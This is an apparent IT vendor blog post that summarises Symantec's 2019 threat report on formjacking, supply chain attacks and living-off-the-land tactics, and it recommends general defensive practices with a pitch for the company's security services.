How cyber attackers are flying under the radar and what you can do about it:
There are steps you can take to better detect intrusions and defend against agile threats
Cybercriminals adapted to diminishing returns from ransomware and cryptojacking with more stealthy and destructive techniques in 2018, according to Symantec’s 2019 Internet Security Threat Report (ISTR).
The report, which analyzes data from Symantec’s Global Intelligence Network to highlight threat activity, noted that threat actors are succeeding with attacks that rely on both new and tried-and-true methods.
A breakthrough threat
Formjacking, a virtual version of credit card skimming, emerged as a significant threat. In this new “get rich quick” scheme, cybercriminals inject malicious JavaScript code into commercial websites. The websites continue to operate normally and sales proceed without interruption, even as credit card details and other sensitive data are funneled to the perpetrators.
Publicly reported attacks on the websites of companies like British Airways and Ticketmaster highlighted the problem, and according to Symantec, an average of 4,800 websites were compromised with formjacking code every month in 2018.
Our data shows that any company, anywhere in the world, which processes payments online is a potential victim of formjacking. – Symantec
Companies with robust defenses are not immune. Attackers often use third parties as stepping stones, infecting less well-defended partners and transmitting code onto targeted websites alongside legitimate processing. Symantec cited a 78% increase in supply chain attacks in 2018.
Targeted attacks living off the land
According to the report, nearly one in 10 targeted attack groups now use malware to destroy and disrupt business operations. This is a 25% increase from the previous year.
They also continue to refine their attack techniques, favoring spear phishing over zero days, and using living off the land (LotL) tactics.
LotL has been a cybersecurity buzzword for the last few years. Targeted attack groups are increasingly leveraging these tactics, using trusted off-the-shelf and pre-installed software tools and operating system features to hide within legitimate processes.
Dozens of Windows system tools can be used this way, and they are often whitelisted, making them attractive to hackers. With LotL, attackers can gain remote access to a device, steal data, or disrupt operations without any malware.
The most likely reason an organization experienced a targeted attack, according to the ISTR, was intelligence gathering.
Protecting against attacks
While organizations in all industries are well aware of the potential impact of successful cyberattacks, many lack confidence in their cybersecurity efforts. Here are a few of the steps you can take to better detect intrusions and defend against agile threats:
- Strengthen threat and vulnerability management practices. Routinely conducting vulnerability assessments and penetration testing will help you target security dollars to the technologies and strategies that will add the most value to your security program. Practicing good cyber hygiene — including strong patch management and password practices — is the bare minimum to protect sensitive data and keep your network secure. Incorporating advanced technologies such as endpoint detection and response (EDR), threat intelligence, network analytics, and defensive deception into your program can help you detect and thwart intrusions, and better understand how you’re being targeted.
- Address third-party risk. Weaknesses in your partners’ security can have a dramatic impact on your own security posture. It is important to carefully monitor the security practices of partners and vendors. Engage in third-party due diligence and periodic assessments to ensure that cybersecurity requirements have been met throughout your supply chain.
- Promote security awareness. Humans are the weakest link in any security strategy. Security awareness at all levels of the organization is critical. Continuously educate your employees about best practices and the latest threats. Emphasize the need for caution when receiving unsolicited or suspicious emails. Make sure you have strong corporate policies regulating bring-your-own-device programs including applications, cloud resources, and IoT devices.
Professional assessments can help you gauge your current capabilities and develop an actionable roadmap for maturing your organization’s overall security posture.
To learn more about best security practices for your organization, contact your SHI account executive.
Anne Grahn contributed to this post.